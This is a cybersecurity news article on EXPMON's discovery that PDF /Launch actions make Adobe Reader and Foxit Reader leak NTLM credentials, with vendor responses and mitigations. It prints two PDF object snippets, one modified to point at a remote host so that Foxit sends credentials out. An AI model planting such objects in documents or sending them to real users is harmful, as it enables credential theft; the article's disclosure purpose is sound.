Cybersecurity researchers at EXPMON have uncovered an intriguing “zero-day behavior” in PDF samples that could potentially be exploited by attackers to leak sensitive NTLM authentication data.
The discovery highlights vulnerabilities in how Adobe Reader and Foxit Reader handle certain PDF actions, though researchers emphasize that no evidence suggests the behavior was created with malicious intent in the analyzed samples.
While examining PDF samples uploaded to VirusTotal (VT) years ago, EXPMON researchers identified a previously unknown behavior in the way PDFs execute actions defined within their code.
Specifically, the vulnerability arises from how specific /Launch actions are processed by Adobe Reader and Foxit Reader. If exploited by a malicious actor, these behaviors could enable the theft of NTLM information a key authentication mechanism in Windows networks.
One of the analyzed samples contained the following crucial code snippet:
5 0 obj
<< /Type /Action
/S /Launch
/F (/Applications/Calculator.app/Contents/MacOS/Calculator)
>>
endobjThis code initiates a /Launch action designed to open a file or application. However, when processed by PDF readers in certain configurations, the behavior inadvertently triggers NTLM information leaks.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
Vulnerability Analysis
Adobe Reader
When the PDF sample is opened in Adobe Reader, the application attempts to locate a network resource named “Applications.” If successful, it initiates a connection and sends NTLM credentials to the server even before the user sees a warning message.
While this behavior doesn’t allow attackers to use public domain names, they could exploit it in private network environments. By crafting a malicious PDF and using an attacker-controlled local server, bad actors could harvest sensitive NTLM information from victims.
Adobe, however, downplayed the risk, citing design choices that limit this behavior to intranet domains. According to their statement:
“DNS/NTLM calls are only made for intranet domains, not for internet domains. Acrobat considers intranet domains to be trusted when the ‘Automatically trust sites from Win OS security zones’ feature is enabled. This feature is enabled by default in Acrobat.”
Foxit Reader
The vulnerability manifests differently in Foxit Reader. While the original sample doesn’t trigger the NTLM leak, modifying the /F (file path) field to reference a public domain such as pub.expmon.com does. For example, this modified code can leak NTLM credentials to a public server controlled by an attacker:
5 0 obj
<< /Type /Action
/S /Launch
/F (/pub.expmon.com/test)
>>
endobjWhen victims open the modified PDF file, their NTLM credentials are sent to the attacker’s public server, even though a warning appears after the fact.
Unlike Adobe, Foxit acknowledged the security implications of this behavior and promptly issued a patch in December 2024.
Vendor Responses
Adobe Reader: Adobe determined the behavior was not a security issue, as it is limited to intranet domains only. They emphasized that this design decision aligns with their trust model for handling network resources.
Foxit Reader: Foxit Software treated the discovery as a legitimate vulnerability, releasing a patched version — Foxit PDF Reader for Windows v2024.4 to address the issue. They encouraged users to download the latest version and highlighted the fix in their security bulletins.
EXPMON’s findings underscore the potential risks of overlooked behaviors in widely used software.
While the identified “zero-day behavior” has not been actively exploited in the wild, it serves as a stark reminder of how easily these vulnerabilities could be weaponized.
EXPMON stressed that their discovery highlights the power of big data analytics (BDA) in identifying missed or unknown threats. By leveraging BDA, the team can retrospectively analyze files and improve exploit detection capabilities.
In a statement, EXPMON shared: “This finding is a good example of the power of BDA analysis and why EXPMON is capable of detecting the most undetected file-based zero-day exploits.”
- For Adobe Reader Users:
While Adobe has not released a patch for this behavior, users can mitigate risks by disabling the “Automatically trust sites from Win OS security zones” feature within Acrobat settings. - For Foxit Reader Users:
Users should immediately update to Foxit Reader v2024.4 or higher to ensure protection against this vulnerability.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates